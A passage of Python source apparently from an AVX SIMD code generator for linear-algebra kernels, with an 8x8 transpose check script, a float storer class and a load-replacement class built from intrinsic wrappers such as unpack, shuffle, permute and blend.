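    return [a[2], b[2], a[3], b[3], a[6], b[6], a[7], b[7]]

def shuffle(a, b, sel):  # sel = (s3, s2, s1, s0), applied per 128-bit lane
    s3, s2, s1, s0 = sel
    return [a[s0], a[s1], b[s2], b[s3], a[4+s0], a[4+s1], b[4+s2], b[4+s3]]

def permute2f128(a, b, imm):  # lane selectors: 0=a.lo, 1=a.hi, 2=b.lo, 3=b.hi
    lanes = [a[0:4], a[4:8], b[0:4], b[4:8]]
    return lanes[imm & 3] + lanes[(imm >> 4) & 3]

rows = [[float(r * 8 + c) for c in range(8)] for r in range(8)]
unplos = [unpacklo(rows[i], rows[i+1]) for i in range(0, 8, 2)]
unphis = [unpackhi(rows[i], rows[i+1]) for i in range(0, 8, 2)]
t = [shuffle(unplos[0], unplos[1], (1, 0, 1, 0)),
     shuffle(unplos[0], unplos[1], (3, 2, 3, 2)),
     shuffle(unphis[0], unphis[1], (1, 0, 1, 0)),
     shuffle(unphis[0], unphis[1], (3, 2, 3, 2)),
     shuffle(unplos[2], unplos[3], (1, 0, 1, 0)),
     shuffle(unplos[2], unplos[3], (3, 2, 3, 2)),
     shuffle(unphis[2], unphis[3], (1, 0, 1, 0)),
     shuffle(unphis[2], unphis[3], (3, 2, 3, 2))]
out = [permute2f128(t[i], t[i+4], 0x20) for i in range(4)] + \
      [permute2f128(t[i], t[i+4], 0x31) for i in range(4)]
for r in range(8):
    for c in range(8):
        assert out[r][c] == rows[c][r]
print("8x8 transpose verified")
```

This mirrors the generator exactly: `t[0..7]` correspond to `trow0..trow7`, and the two permute passes produce the first and second four output rows.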
class _Flt8Storer(Storer):
    def __init__(self):
        super(_Flt8Storer, self).__init__()
    def storeMatrix(self, mParams):
        nu = 8
        src, dst = mParams['nuM'], mParams['m']
        sL, sR = mParams['nuML'], mParams['nuMR']
        dL, dR = mParams['mL'], mParams['mR']
        M, N = mParams['M'], mParams['N']
        nuMM, nuMN = mParams['nuMM'], mParams['nuMN']
        isCompact = mParams['compact']
        instructions = [ Comment(str(nuMM) + "x" + str(nuMN) + " -> " + str(M) + "x" + str(N)) ]
        if M == 1 and N == 1:
            pc = AddressOf(sa(dst[dL.of(0),dR.of(0)]))
            va = mm256LoadGs(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
            instr = mm256StoreGs(va, pc, [0])
            instructions += [ instr ]
        elif (N == 1 and ((M <= nu and not isCompact) or (M < nu and isCompact))) or (M == 1 and N < nu):
            va = mm256LoadGs(Pointer(src[sL.of(0),sR.of(0)]), range(nu))
            pc = Pointer(dst[dL.of(0),dR.of(0)])
            horizontal = M == 1
            instr = mm256StoreGs(va, pc, range(max(M,N)), isCompact=isCompact, horizontal=horizontal)
            # if isCompact:
            #     pc = Pointer(dst[dL.of(0),dR.of(0)])
            #     if max(M,N) < nu:
            #         vmask = max(M,N)*[1] + (nu-max(M,N))*[0]
            #         instrs = [ mm256MaskstorePs(vmask, va, pc) ]
            #     else:
            #         instrs = [ mm256StoreuPs(va, pc) ]
            # else:
            #     vmask = [1] + 7*[0]
            #     pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M) ]
            #     instrs = []
            #     if M == 2:
            #         instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, va, (2,2,2,1)), pcs[1]) )
            #     elif M == 3:
            #         instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, va, (3,3,3,1)), pcs[1]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, va, (3,3,3,2)), pcs[2]) )
            #     elif M == 4:
            #         instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
            #     elif M == 5:
            #         instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
            #         lane1 = mm256Permute2f128Ps(va, va, [1,0,0,0,0,0,0,1])
            #         instrs.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
            #     elif M == 6:
            #         instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
            #         lane1 = mm256Permute2f128Ps(va, va, [1,0,0,0,0,0,0,1])
            #         instrs.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (2,2,2,1)), pcs[5]) )
            #     elif M == 7:
            #         instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
            #         lane1 = mm256Permute2f128Ps(va, va, [1,0,0,0,0,0,0,1])
            #         instrs.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (3,3,3,1)), pcs[5]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, lane1, (3,3,3,2)), pcs[6]) )
            #     elif M == 8:
            #         instrs.append( mm256MaskstorePs(vmask, va, pcs[0]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,1)), pcs[1]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,2)), pcs[2]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(va, mm256SetzeroPs(), (0,0,0,3)), pcs[3]) )
            #         lane1 = mm256Permute2f128Ps(va, va, [1,0,0,0,0,0,0,1])
            #         instrs.append( mm256MaskstorePs(vmask, lane1, pcs[4]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0,0,0,1)), pcs[5]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0,0,0,2)), pcs[6]) )
            #         instrs.append( mm256MaskstorePs(vmask, mm256ShufflePs(lane1, mm256SetzeroPs(), (0,0,0,3)), pcs[7]) )
            instructions += [ instr ]
        elif (M < nu and N < nu) or (M == nu and N > 1 and N < nu) or (M > 1 and M < nu and N == nu):
            pcs = [ Pointer(dst[dL.of(i),dR.of(0)]) for i in range(M) ]
            vas = [ mm256LoadGs(Pointer(src[sL.of(i),sR.of(0)]), range(nu)) for i in range(M) ]
            # if N < nu:
            #     vmask = N*[1] + (nu-N)*[0]
            #     instrs = [ mm256MaskstorePs(vmask, vas[i], pcs[i]) for i in range(M) ]
            # else:
            instrs = [ mm256StoreGs(vas[i], pcs[i], range(N)) for i in range(M) ]
            instructions += instrs
        return instructions
class AVXLoadReplacer(LoadReplacer):
    def __init__(self, opts):
        super(AVXLoadReplacer, self).__init__(opts)
    def mm256BroadcastSd(self, src, repList):
        sList = sorted(repList, key=lambda t: t[0], reverse=True)
        dst = sList[0][1]
        if dst.reglen == 4 and dst.mrmap == [0,1,2,3]:
            # at = src.pointer.getAt()
            # direct = 1 if src.pointer.getMat().size[1] > 1 else 0 # Temp solution
            # lane1, posInLane = at[direct] > 1, at[direct] % 2
            # immBitList = [0,0,1,1,0,0,0,1] if lane1 else [0,0,1,0,0,0,0,0]
            # dupLane = mm256Permute2f128Pd(mm256LoaduPd(dst.pointer), mm256LoaduPd(dst.pointer), immBitList) # Dup the lane where we can find the value
            # return mm256ShufflePd(dupLane, dupLane, [posInLane]*4)
            dupx2 = mm256UnpackloPd(mm256LoaduPd(dst.pointer), mm256LoaduPd(dst.pointer))
            return mm256Permute2f128Pd(dupx2, dupx2, [0,0,1,0,0,0,0,0]) # Dup first lane
    def mm256LoadGd(self, src, repList, bounds):
        # src is the mm256LoadGd we want to replace with combinations of elements from previous stores in repList
        # if src.pointer._ref.physLayout.name == 'C' and src.pointer.at == (0,8) and src.mrmap == [0]:
        #     pass
        list_by_line = sorted(repList, key=lambda t: t[0], reverse=True)
        dsts_by_line = [ t[1] for t in list_by_line ]
        src_dsts_map = self.src_dsts_map(src, dsts_by_line)
        if len(src_dsts_map) > 1:
            dsts = [ t[2] for t in src_dsts_map ]
            if len(src_dsts_map) == 4 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0]),([2],[0]),([3],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for i in range(4):
                    notums[i][dsts[i].mrmap.index(0)] = False
                ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(4) ]
                shuf_1st = mm256UnpackloPd(ld_dsts[0], ld_dsts[1])
                shuf_2nd = mm256UnpackloPd(ld_dsts[2], ld_dsts[3])
                # blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
                # return blend_1st_2nd
                return mm256Permute2f128Pd(shuf_1st, shuf_2nd, [0,0,1,0,0,0,0,0])
            elif len(src_dsts_map) == 4 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[1]),([2],[0]),([3],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for i,p in enumerate([2,1,0,0]):
                    notums[i][dsts[i].mrmap.index(p)] = False
                ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(4) ]
                shuf_2nd = mm256UnpackloPd(ld_dsts[2], ld_dsts[3])
                perm = mm256Permute2f128Pd(ld_dsts[0], shuf_2nd, [0,0,1,0,0,0,0,1])
                return mm256BlendPd(perm, ld_dsts[1], [0,0,1,0])
            elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0]),([2],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for i in range(3):
                    notums[i][dsts[i].mrmap.index(0)] = False
                ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(3) ]
                shuf_1st = mm256UnpackloPd(ld_dsts[0], ld_dsts[1])
                shuf_2nd = mm256UnpackloPd(ld_dsts[2], mm256SetzeroPd())
                # blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
                # return blend_1st_2nd
                return mm256Permute2f128Pd(shuf_1st, shuf_2nd, [0,0,1,0,0,0,0,0])
            elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[1]),([1],[0]),([2],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for i,p in enumerate([1,0,0]):
                    notums[i][dsts[i].mrmap.index(p)] = False
                ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(3) ]
                shuf_1st = mm256ShufflePd(ld_dsts[0], ld_dsts[1], [0,0,0,1])
                shuf_2nd = mm256UnpackloPd(ld_dsts[2], mm256SetzeroPd())
                return mm256Permute2f128Pd(shuf_1st, shuf_2nd, [0,0,1,0,0,0,0,0])
            elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0]),([2,3],[1,2])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                notums[0][dsts[0].mrmap.index(0)] = False
                notums[1][dsts[1].mrmap.index(0)] = False
                for p in [1,2]:
                    notums[2][dsts[2].mrmap.index(p)] = False
                ld_dst2 = mm256LoadGd(dsts[2].pointer, dsts[2].mrmap, isCompact=dsts[2].isCompact, horizontal=dsts[2].horizontal, not_using_mask=notums[2])
                immBitList = [0,0,0,0,1,0,0,0] # Move 1st lane to 2nd. 1st lane is zeroed
                inter_lane = mm256Permute2f128Pd(ld_dst2, ld_dst2, immBitList)
                shuf_1st = mm256ShufflePd(mm256LoadGd(dsts[0].pointer, dsts[0].mrmap, isCompact=dsts[0].isCompact, horizontal=dsts[0].horizontal, not_using_mask=notums[0]), \
                                          mm256LoadGd(dsts[1].pointer, dsts[1].mrmap, isCompact=dsts[1].isCompact, horizontal=dsts[1].horizontal, not_using_mask=notums[1]), [0,0,0,0])
                shuf_2nd = mm256ShufflePd(inter_lane, ld_dst2, [0,1,0,0])
                blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
                return blend_1st_2nd
            elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0]),([2],[1])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                notums[0][dsts[0].mrmap.index(0)] = False
                notums[1][dsts[1].mrmap.index(0)] = False
                notums[2][dsts[2].mrmap.index(1)] = False
                ld_dst2 = mm256LoadGd(dsts[2].pointer, dsts[2].mrmap, isCompact=dsts[2].isCompact, horizontal=dsts[2].horizontal, not_using_mask=notums[2])
                immBitList = [0,0,0,0,1,0,0,0] # Move 1st lane to 2nd. 1st lane is zeroed
                inter_lane = mm256Permute2f128Pd(ld_dst2, ld_dst2, immBitList)
                shuf_1st = mm256UnpackloPd(mm256LoadGd(dsts[0].pointer, dsts[0].mrmap, isCompact=dsts[0].isCompact, horizontal=dsts[0].horizontal, not_using_mask=notums[0]), \
                                           mm256LoadGd(dsts[1].pointer, dsts[1].mrmap, isCompact=dsts[1].isCompact, horizontal=dsts[1].horizontal, not_using_mask=notums[1]))
                shuf_2nd = mm256UnpackhiPd(inter_lane, mm256SetzeroPd())
                blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
                return blend_1st_2nd
            elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[3]),([1],[3]),([2],[3])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for dst,notum in zip(dsts,notums):
                    notum[dst.mrmap.index(3)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                immBitList = [1,0,0,0,0,0,0,1]
                perms_lane = [ mm256Permute2f128Pd(ld, ld, immBitList) for ld in lds[:2] ]
                shuf1 = mm256UnpackhiPd(perms_lane[0], perms_lane[1])
                shuf2 = mm256UnpackhiPd(lds[2], mm256SetzeroPd())
                blend = mm256BlendPd(shuf1, shuf2, [1,1,0,0])
                return blend
            elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[1]),([2],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for dst,notum,p in zip(dsts,notums,[2,1,0]):
                    notum[dst.mrmap.index(p)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                perm_lane02 = mm256Permute2f128Pd(lds[0], lds[2], [0,0,1,0,0,0,0,1])
                blend1 = mm256BlendPd(mm256SetzeroPd(), lds[1], [0,0,1,0])
                load_rep = mm256BlendPd(perm_lane02, blend1, [1,0,1,0])
                return load_rep
            elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0,1],[0,1]),([2],[2]),([3],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for p in [0,1]:
                    notums[0][dsts[0].mrmap.index(p)] = False
                notums[1][dsts[1].mrmap.index(2)] = False
                notums[2][dsts[2].mrmap.index(0)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                perm = mm256Permute2f128Pd(lds[0], lds[2], [0,0,1,0,0,0,0,0])
                shuf = mm256ShufflePd(perm, perm, [0,0,1,0])
                return mm256BlendPd(lds[1], shuf, [1,0,1,1])
            elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[1]),([2],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for d,p in [(0,0),(1,1),(2,0)]:
                    notums[d][dsts[d].mrmap.index(p)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                blend01 = mm256BlendPd(lds[0], lds[1], [0,0,1,0])
                perm = mm256Permute2f128Pd(blend01, lds[2], [0,0,1,0,0,0,0,0])
                return mm256BlendPd(perm, mm256SetzeroPd(), [1,0,0,0])
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[1]),([1],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for dst,notum,p in zip(dsts,notums,[1,0]):
                    notum[dst.mrmap.index(p)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                blend_lds = [ mm256BlendPd(ld, mm256SetzeroPd(), [1,1,0,0]) for ld in lds ]
                shuf = mm256ShufflePd(blend_lds[0], blend_lds[1], [0,0,0,1])
                return shuf
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[1]),([1],[1])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for dst,notum in zip(dsts,notums):
                    notum[dst.mrmap.index(1)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                blend_lds = [ mm256BlendPd(ld, mm256SetzeroPd(), [1,1,0,0]) for ld in lds ]
                shuf = mm256UnpackhiPd(blend_lds[0], blend_lds[1])
                return shuf
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[3]),([1],[3])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for dst,notum in zip(dsts,notums):
                    notum[dst.mrmap.index(3)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                immBitList = [1,0,0,0,0,0,0,1]
                perms_lane = [ mm256Permute2f128Pd(ld, ld, immBitList) for ld in lds ]
                shuf = mm256UnpackhiPd(perms_lane[0], perms_lane[1])
                return shuf
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1,2],[0,1])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                notums[0][dsts[0].mrmap.index(0)] = False
                for p in [0,1]:
                    notums[1][dsts[1].mrmap.index(p)] = False
                ld_dst1 = mm256LoadGd(dsts[1].pointer, dsts[1].mrmap, isCompact=dsts[1].isCompact, horizontal=dsts[1].horizontal, not_using_mask=notums[1])
                immBitList = [0,0,0,0,1,0,0,0] # Move 1st lane to 2nd. 1st lane is zeroed
                inter_lane = mm256Permute2f128Pd(ld_dst1, ld_dst1, immBitList)
                shuf_1st = mm256UnpackloPd(mm256LoadGd(dsts[0].pointer, dsts[0].mrmap, isCompact=dsts[0].isCompact, horizontal=dsts[0].horizontal, not_using_mask=notums[0]), ld_dst1)
                # shuf_1st = mm256ShufflePd(mm256LoadGd(dsts[0].pointer, dsts[0].mrmap), mm256LoadGd(dsts[1].pointer, dsts[1].mrmap), [0,0,0,0])
                shuf_2nd = mm256UnpackhiPd(inter_lane, mm256SetzeroPd())
                blend_1st_2nd = mm256BlendPd(shuf_1st, shuf_2nd, [1,1,0,0])
                return blend_1st_2nd
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0,1],[0,1]),([2],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for p in [0,1]:
                    notums[0][dsts[0].mrmap.index(p)] = False
                notums[1][dsts[1].mrmap.index(0)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                blend1 = mm256BlendPd(mm256SetzeroPd(), lds[1], [0,0,0,1])
                inter_lane = mm256Permute2f128Pd(blend1, blend1, [0,0,0,0,1,0,0,0])
                return mm256BlendPd(lds[0], inter_lane, [1,1,0,0])
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0,1,2],[0,1,2]),([3],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for p in [0,1,2]:
                    notums[0][dsts[0].mrmap.index(p)] = False
                notums[1][dsts[1].mrmap.index(0)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                perm = mm256Permute2f128Pd(lds[1], lds[1], [0,0,0,0,1,0,0,0])
                shuf = mm256ShufflePd(perm, perm, [0,0,0,0])
                return mm256BlendPd(lds[0], shuf, [1,0,0,0])
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[0])]) ]):
                sys.exit("replacement under construction")
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for dst,notum,p in zip(dsts,notums,[2,0]):
                    notum[dst.mrmap.index(p)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                immBitList = [1,0,0,0,0,0,0,1]
                perm_lane = mm256Permute2f128Pd(lds[0], lds[0], immBitList)
                load_rep = mm256BlendPd(perm_lane, lds[1], [0,0,1,0])
                return load_rep
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[1])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for dst,notum,p in zip(dsts,notums,[2,1]):
                    notum[dst.mrmap.index(p)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                immBitList = [1,0,0,0,0,0,0,1]
                perm_lane = mm256Permute2f128Pd(lds[0], lds[0], immBitList)
                load_rep = mm256BlendPd(perm_lane, lds[1], [0,0,1,0])
                return load_rep
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[2]),([1],[2])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for dst,notum in zip(dsts,notums):
                    notum[dst.mrmap.index(2)] = False
                lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                immBitList = [1,0,0,0,0,0,0,1]
                perms_lane = [ mm256Permute2f128Pd(ld, ld, immBitList) for ld in lds ]
                shuf = mm256UnpackloPd(perms_lane[0], perms_lane[1])
                return shuf
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[0]),([1],[0])]) ]):
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                for i in range(2):
                    notums[i][dsts[i].mrmap.index(0)] = False
                ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(2) ]
                shuf_1st = mm256UnpackloPd(ld_dsts[0], ld_dsts[1])
                blend_1st_zeros = mm256BlendPd(shuf_1st, mm256SetzeroPd(), [1,1,0,0])
                return blend_1st_zeros
            elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0],[1]),([1],[2])]) ]): # Like single map, dist == -1
                notums = [ [True]*len(dst.mrmap) for dst in dsts ]
                notums[0][1], notums[1][2] = False, False
                ld_dsts = [ mm256LoadGd(dsts[i].pointer, dsts[i].mrmap, isCompact=dsts[i].isCompact, horizontal=dsts[i].horizontal, not_using_mask=notums[i]) for i in range(2) ]
                lane_perm = mm256Permute2f128Pd(ld_dsts[1], ld_dsts[1], [1,0,0,0,0,0,0,1])
                blend_dst = mm256BlendPd(mm256SetzeroPd(), ld_dsts[0], [0,0,1,0])
                load_rep = mm256ShufflePd(blend_dst, lane_perm, [0,1,0,1])
                return load_rep
            elif dsts[-1] is None:
                if len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[ ([0],[0]) ]) ]): # Blending
                    dst = dsts[0]
                    dnotum = [True]*len(dst.mrmap)
                    dnotum[0] = False
                    ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=dnotum)
                    src.not_using_mask[0] = True
                    imm_list = [0]*dst.reglen
                    imm_list[dst.reglen-1] = 1
                    return mm256BlendPd(src, ld_dst, imm_list)
                elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[ ([0],[1]) ]) ]):
                    dst = dsts[0]
                    dnotum = [True]*len(dst.mrmap)
                    dnotum[1] = False
                    ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=dnotum)
                    blend_dst = mm256BlendPd(src, ld_dst, [0,0,1,0])
                    src.not_using_mask[0] = True
                    return mm256ShufflePd(blend_dst, src, [1,0,1,1])
                elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[ ([1],[0]) ]) ]):
                    dst = dsts[0]
                    dnotum = [True]*len(dst.mrmap)
                    dnotum[0] = False
                    ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=dnotum)
                    blend_dst = mm256BlendPd(src, ld_dst, [0,0,0,1])
                    src.not_using_mask[1] = True
                    return mm256ShufflePd(src, blend_dst, [1,0,0,0])
                elif len(src_dsts_map) == 2 and all([ t[:2] == p for t,p in zip(src_dsts_map,[ ([1],[1]) ]) ]):
                    dst = dsts[0]
                    dnotum = [True]*len(dst.mrmap)
                    dnotum[1] = False
                    ld_dst = mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=dnotum)
                    src.not_using_mask[1] = True
                    imm_list = [0]*dst.reglen
                    imm_list[-2] = 1
                    return mm256BlendPd(src, ld_dst, imm_list)
                elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([0,1],[0,1]),([2],[2])]) ]):
                    notums = [ [True]*len(dst.mrmap) for dst in dsts[:2] ]
                    for p in [0,1]:
                        notums[0][dsts[0].mrmap.index(p)] = False
                    notums[1][dsts[1].mrmap.index(2)] = False
                    lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts,notums) ]
                    src.not_using_mask[:3] = [True]*3
                    blend_dsts = mm256BlendPd(lds[0], lds[1], [0,1,0,0])
                    return mm256BlendPd(blend_dsts, src, [1,0,0,0])
                elif len(src_dsts_map) == 3 and all([ t[:2] == p for t,p in zip(src_dsts_map,[([1],[1]),([2],[0])]) ]):
                    notums = [ [True]*len(dst.mrmap) for dst in dsts[:-1] ]
                    notums[0][dsts[0].mrmap.index(1)] = False
                    notums[1][dsts[1].mrmap.index(0)] = False
                    src.not_using_mask[1:3] = [True]*2
                    lds = [ mm256LoadGd(dst.pointer, dst.mrmap, isCompact=dst.isCompact, horizontal=dst.horizontal, not_using_mask=notum) for dst,notum in zip(dsts[:-1],notums) ]
                    imm_list = [0]*dsts[0].reglen
                    imm_list[-2] = 1
                    blend0 = mm256BlendPd(src, lds[0], imm_list)
                    blend1 = mm256BlendPd(mm256SetzeroPd(), lds[1], [0,0,0,1])
